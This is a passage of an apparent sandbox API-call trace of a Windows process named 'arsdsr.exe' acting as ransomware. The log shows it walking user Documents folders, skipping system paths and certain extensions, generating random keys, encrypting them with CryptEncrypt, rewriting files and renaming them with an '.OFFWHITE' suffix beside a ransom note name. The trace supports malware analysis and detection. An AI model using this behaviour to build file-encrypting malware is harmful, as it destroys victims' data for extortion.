[0132.697] lstrcmpiW (lpString1=".xlsx", lpString2=".mp3") returned 1 [0132.697] lstrcmpiW (lpString1=".xlsx", lpString2=".pif") returned 1 [0132.697] lstrcmpiW (lpString1=".xlsx", lpString2=".mp4") returned 1 [0132.697] lstrcmpiW (lpString1=".xlsx", lpString2=".OFFWHITE") returned 1 [0132.697] lstrcmpiW (lpString1=".xlsx", lpString2=".msi") returned 1 [0132.697] lstrcmpiW (lpString1="1tzKSsYVLnjt.xlsx", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0132.697] GetProcessHeap () returned 0x500000 [0132.697] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f588 [0132.697] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1tzKSsYVLnjt.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1tzkssyvlnjt.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0132.698] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=27785) returned 1 [0132.698] GetProcessHeap () returned 0x500000 [0132.698] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0132.698] GetProcessHeap () returned 0x500000 [0132.698] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0132.698] GetProcessHeap () returned 0x500000 [0132.698] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0132.698] GetProcessHeap () returned 0x500000 [0132.698] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0132.698] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.698] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.698] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0132.698] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.698] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.698] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0132.698] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.698] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.699] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e310*=0x100) returned 1 [0132.699] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.699] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.699] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0132.699] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x6c89, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.699] SetLastError (dwErrCode=0x0) [0132.699] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.704] GetLastError () returned 0x0 [0132.704] GetLastError () returned 0x0 [0132.704] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x6d89, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.704] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.705] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x6e89, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.705] WriteFile (in: hFile=0xb0, lpBuffer=0x53f588*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x53f588*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0132.705] GetProcessHeap () returned 0x500000 [0132.705] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x6c89) returned 0x55a7b8 [0132.705] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.705] ReadFile (in: hFile=0xb0, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x6c89, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295e540*=0x6c89, lpOverlapped=0x0) returned 1 [0132.707] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.708] WriteFile (in: hFile=0xb0, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x6c89, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295e54c*=0x6c89, lpOverlapped=0x0) returned 1 [0132.708] GetProcessHeap () returned 0x500000 [0132.708] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0132.708] CloseHandle (hObject=0xb0) returned 1 [0132.709] GetProcessHeap () returned 0x500000 [0132.709] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0132.709] GetProcessHeap () returned 0x500000 [0132.709] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0132.709] GetProcessHeap () returned 0x500000 [0132.709] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0132.709] GetProcessHeap () returned 0x500000 [0132.709] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0132.709] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1tzKSsYVLnjt.xlsx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1tzKSsYVLnjt.xlsx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1tzKSsYVLnjt.xlsx" [0132.709] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1tzKSsYVLnjt.xlsx", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1tzKSsYVLnjt.xlsx.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1tzKSsYVLnjt.xlsx.OFFWHITE" [0132.709] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1tzKSsYVLnjt.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1tzkssyvlnjt.xlsx"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1tzKSsYVLnjt.xlsx.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1tzkssyvlnjt.xlsx.offwhite")) returned 1 [0132.710] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf059bd30, ftCreationTime.dwHighDateTime=0x1d5e69b, ftLastAccessTime.dwLowDateTime=0x369f71b0, ftLastAccessTime.dwHighDateTime=0x1d5e460, ftLastWriteTime.dwLowDateTime=0x369f71b0, ftLastWriteTime.dwHighDateTime=0x1d5e460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="2M0NVS5En5W", cAlternateFileName="2M0NVS~1")) returned 1 [0132.710] lstrcmpiW (lpString1="2M0NVS5En5W", lpString2=".") returned 1 [0132.710] lstrcmpiW (lpString1="2M0NVS5En5W", lpString2="..") returned 1 [0132.710] lstrcmpiW (lpString1="2M0NVS5En5W", lpString2="...") returned 1 [0132.710] lstrcmpiW (lpString1="2M0NVS5En5W", lpString2="windows") returned -1 [0132.710] lstrcmpiW (lpString1="2M0NVS5En5W", lpString2="$recycle.bin") returned 1 [0132.710] lstrcmpiW (lpString1="2M0NVS5En5W", lpString2="rsa") returned -1 [0132.710] lstrcmpiW (lpString1="2M0NVS5En5W", lpString2="ntuser.dat") returned -1 [0132.710] lstrcmpiW (lpString1="2M0NVS5En5W", lpString2="programdata") returned -1 [0132.711] lstrcmpiW (lpString1="2M0NVS5En5W", lpString2="appdata") returned -1 [0132.711] lstrcmpiW (lpString1="2M0NVS5En5W", lpString2="program files") returned -1 [0132.711] lstrcmpiW (lpString1="2M0NVS5En5W", lpString2="program files (x86)") returned -1 [0132.711] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0132.711] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="2M0NVS5En5W" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W" [0132.711] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\" [0132.711] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\" [0132.711] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\*.*" [0132.711] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf059bd30, ftCreationTime.dwHighDateTime=0x1d5e69b, ftLastAccessTime.dwLowDateTime=0x369f71b0, ftLastAccessTime.dwHighDateTime=0x1d5e460, ftLastWriteTime.dwLowDateTime=0x369f71b0, ftLastWriteTime.dwHighDateTime=0x1d5e460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295debc, dwReserved1=0x3703c3be, cFileName=".", cAlternateFileName="")) returned 0x544650 [0132.714] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0132.714] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf059bd30, ftCreationTime.dwHighDateTime=0x1d5e69b, ftLastAccessTime.dwLowDateTime=0x369f71b0, ftLastAccessTime.dwHighDateTime=0x1d5e460, ftLastWriteTime.dwLowDateTime=0x369f71b0, ftLastWriteTime.dwHighDateTime=0x1d5e460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295debc, dwReserved1=0x3703c3be, cFileName="..", cAlternateFileName="")) returned 1 [0132.714] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0132.715] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0132.715] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbaa31d20, ftCreationTime.dwHighDateTime=0x1d5dd28, ftLastAccessTime.dwLowDateTime=0xa8db1940, ftLastAccessTime.dwHighDateTime=0x1d5d81d, ftLastWriteTime.dwLowDateTime=0xa8db1940, ftLastWriteTime.dwHighDateTime=0x1d5d81d, nFileSizeHigh=0x0, nFileSizeLow=0x16c54, dwReserved0=0x295debc, dwReserved1=0x3703c3be, cFileName="32slVm7ULnxS8 f.docx", cAlternateFileName="32SLVM~1.DOC")) returned 1 [0132.715] lstrcmpiW (lpString1="32slVm7ULnxS8 f.docx", lpString2=".") returned 1 [0132.715] lstrcmpiW (lpString1="32slVm7ULnxS8 f.docx", lpString2="..") returned 1 [0132.715] lstrcmpiW (lpString1="32slVm7ULnxS8 f.docx", lpString2="...") returned 1 [0132.715] lstrcmpiW (lpString1="32slVm7ULnxS8 f.docx", lpString2="windows") returned -1 [0132.715] lstrcmpiW (lpString1="32slVm7ULnxS8 f.docx", lpString2="$recycle.bin") returned 1 [0132.715] lstrcmpiW (lpString1="32slVm7ULnxS8 f.docx", lpString2="rsa") returned -1 [0132.715] lstrcmpiW (lpString1="32slVm7ULnxS8 f.docx", lpString2="ntuser.dat") returned -1 [0132.715] lstrcmpiW (lpString1="32slVm7ULnxS8 f.docx", lpString2="programdata") returned -1 [0132.715] lstrcmpiW (lpString1="32slVm7ULnxS8 f.docx", lpString2="appdata") returned -1 [0132.715] lstrcmpiW (lpString1="32slVm7ULnxS8 f.docx", lpString2="program files") returned -1 [0132.715] lstrcmpiW (lpString1="32slVm7ULnxS8 f.docx", lpString2="program files (x86)") returned -1 [0132.715] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\" [0132.715] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\", lpString2="32slVm7ULnxS8 f.docx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\32slVm7ULnxS8 f.docx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\32slVm7ULnxS8 f.docx" [0132.715] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.715] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.715] PathFindExtensionW (pszPath="32slVm7ULnxS8 f.docx") returned=".docx" [0132.715] lstrcmpiW (lpString1=".docx", lpString2=".exe") returned -1 [0132.715] lstrcmpiW (lpString1=".docx", lpString2=".log") returned -1 [0132.715] lstrcmpiW (lpString1=".docx", lpString2=".cab") returned 1 [0132.715] lstrcmpiW (lpString1=".docx", lpString2=".cmd") returned 1 [0132.715] lstrcmpiW (lpString1=".docx", lpString2=".com") returned 1 [0132.715] lstrcmpiW (lpString1=".docx", lpString2=".cpl") returned 1 [0132.715] lstrcmpiW (lpString1=".docx", lpString2=".ini") returned -1 [0132.715] lstrcmpiW (lpString1=".docx", lpString2=".dll") returned 1 [0132.715] lstrcmpiW (lpString1=".docx", lpString2=".url") returned -1 [0132.716] lstrcmpiW (lpString1=".docx", lpString2=".ttf") returned -1 [0132.716] lstrcmpiW (lpString1=".docx", lpString2=".mp3") returned -1 [0132.716] lstrcmpiW (lpString1=".docx", lpString2=".pif") returned -1 [0132.716] lstrcmpiW (lpString1=".docx", lpString2=".mp4") returned -1 [0132.716] lstrcmpiW (lpString1=".docx", lpString2=".OFFWHITE") returned -1 [0132.716] lstrcmpiW (lpString1=".docx", lpString2=".msi") returned -1 [0132.716] lstrcmpiW (lpString1="32slVm7ULnxS8 f.docx", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0132.716] GetProcessHeap () returned 0x500000 [0132.716] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f598 [0132.716] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\32slVm7ULnxS8 f.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2m0nvs5en5w\\32slvm7ulnxs8 f.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0132.717] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=93268) returned 1 [0132.717] GetProcessHeap () returned 0x500000 [0132.717] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0132.717] GetProcessHeap () returned 0x500000 [0132.717] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0132.717] GetProcessHeap () returned 0x500000 [0132.717] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0132.717] GetProcessHeap () returned 0x500000 [0132.717] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0132.717] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.717] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.717] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0132.717] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.717] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.717] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0132.718] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.718] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.718] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295dc90*=0x100) returned 1 [0132.718] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.718] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.718] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0132.718] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x16c54, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.718] SetLastError (dwErrCode=0x0) [0132.718] WriteFile (in: hFile=0x21c, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0132.722] GetLastError () returned 0x0 [0132.722] GetLastError () returned 0x0 [0132.722] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x16d54, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.722] WriteFile (in: hFile=0x21c, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0132.722] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x16e54, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.722] WriteFile (in: hFile=0x21c, lpBuffer=0x53f598*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x53f598*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0132.722] GetProcessHeap () returned 0x500000 [0132.722] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x16c54) returned 0x55a7b8 [0132.722] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.722] ReadFile (in: hFile=0x21c, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x16c54, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295dec0*=0x16c54, lpOverlapped=0x0) returned 1 [0132.735] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.735] WriteFile (in: hFile=0x21c, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x16c54, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295decc*=0x16c54, lpOverlapped=0x0) returned 1 [0132.736] GetProcessHeap () returned 0x500000 [0132.736] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0132.736] CloseHandle (hObject=0x21c) returned 1 [0132.742] GetProcessHeap () returned 0x500000 [0132.742] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0132.742] GetProcessHeap () returned 0x500000 [0132.742] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0132.742] GetProcessHeap () returned 0x500000 [0132.742] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0132.742] GetProcessHeap () returned 0x500000 [0132.742] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0132.742] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\32slVm7ULnxS8 f.docx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\32slVm7ULnxS8 f.docx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\32slVm7ULnxS8 f.docx" [0132.742] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\32slVm7ULnxS8 f.docx", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\32slVm7ULnxS8 f.docx.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\32slVm7ULnxS8 f.docx.OFFWHITE" [0132.742] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\32slVm7ULnxS8 f.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2m0nvs5en5w\\32slvm7ulnxs8 f.docx"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\32slVm7ULnxS8 f.docx.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2m0nvs5en5w\\32slvm7ulnxs8 f.docx.offwhite")) returned 1 [0132.743] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7645350, ftCreationTime.dwHighDateTime=0x1d5e34a, ftLastAccessTime.dwLowDateTime=0xcc7d0b30, ftLastAccessTime.dwHighDateTime=0x1d5e57c, ftLastWriteTime.dwLowDateTime=0xcc7d0b30, ftLastWriteTime.dwHighDateTime=0x1d5e57c, nFileSizeHigh=0x0, nFileSizeLow=0x4bd5, dwReserved0=0x295debc, dwReserved1=0x3703c3be, cFileName="J4NCeSeR.xlsx", cAlternateFileName="J4NCES~1.XLS")) returned 1 [0132.743] lstrcmpiW (lpString1="J4NCeSeR.xlsx", lpString2=".") returned 1 [0132.743] lstrcmpiW (lpString1="J4NCeSeR.xlsx", lpString2="..") returned 1 [0132.743] lstrcmpiW (lpString1="J4NCeSeR.xlsx", lpString2="...") returned 1 [0132.743] lstrcmpiW (lpString1="J4NCeSeR.xlsx", lpString2="windows") returned -1 [0132.743] lstrcmpiW (lpString1="J4NCeSeR.xlsx", lpString2="$recycle.bin") returned 1 [0132.743] lstrcmpiW (lpString1="J4NCeSeR.xlsx", lpString2="rsa") returned -1 [0132.743] lstrcmpiW (lpString1="J4NCeSeR.xlsx", lpString2="ntuser.dat") returned -1 [0132.743] lstrcmpiW (lpString1="J4NCeSeR.xlsx", lpString2="programdata") returned -1 [0132.743] lstrcmpiW (lpString1="J4NCeSeR.xlsx", lpString2="appdata") returned 1 [0132.743] lstrcmpiW (lpString1="J4NCeSeR.xlsx", lpString2="program files") returned -1 [0132.743] lstrcmpiW (lpString1="J4NCeSeR.xlsx", lpString2="program files (x86)") returned -1 [0132.743] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\" [0132.744] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\", lpString2="J4NCeSeR.xlsx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\J4NCeSeR.xlsx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\J4NCeSeR.xlsx" [0132.744] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.744] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.744] PathFindExtensionW (pszPath="J4NCeSeR.xlsx") returned=".xlsx" [0132.744] lstrcmpiW (lpString1=".xlsx", lpString2=".exe") returned 1 [0132.744] lstrcmpiW (lpString1=".xlsx", lpString2=".log") returned 1 [0132.744] lstrcmpiW (lpString1=".xlsx", lpString2=".cab") returned 1 [0132.744] lstrcmpiW (lpString1=".xlsx", lpString2=".cmd") returned 1 [0132.744] lstrcmpiW (lpString1=".xlsx", lpString2=".com") returned 1 [0132.744] lstrcmpiW (lpString1=".xlsx", lpString2=".cpl") returned 1 [0132.744] lstrcmpiW (lpString1=".xlsx", lpString2=".ini") returned 1 [0132.744] lstrcmpiW (lpString1=".xlsx", lpString2=".dll") returned 1 [0132.744] lstrcmpiW (lpString1=".xlsx", lpString2=".url") returned 1 [0132.744] lstrcmpiW (lpString1=".xlsx", lpString2=".ttf") returned 1 [0132.744] lstrcmpiW (lpString1=".xlsx", lpString2=".mp3") returned 1 [0132.744] lstrcmpiW (lpString1=".xlsx", lpString2=".pif") returned 1 [0132.744] lstrcmpiW (lpString1=".xlsx", lpString2=".mp4") returned 1 [0132.744] lstrcmpiW (lpString1=".xlsx", lpString2=".OFFWHITE") returned 1 [0132.744] lstrcmpiW (lpString1=".xlsx", lpString2=".msi") returned 1 [0132.744] lstrcmpiW (lpString1="J4NCeSeR.xlsx", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0132.744] GetProcessHeap () returned 0x500000 [0132.744] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f5a8 [0132.744] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS 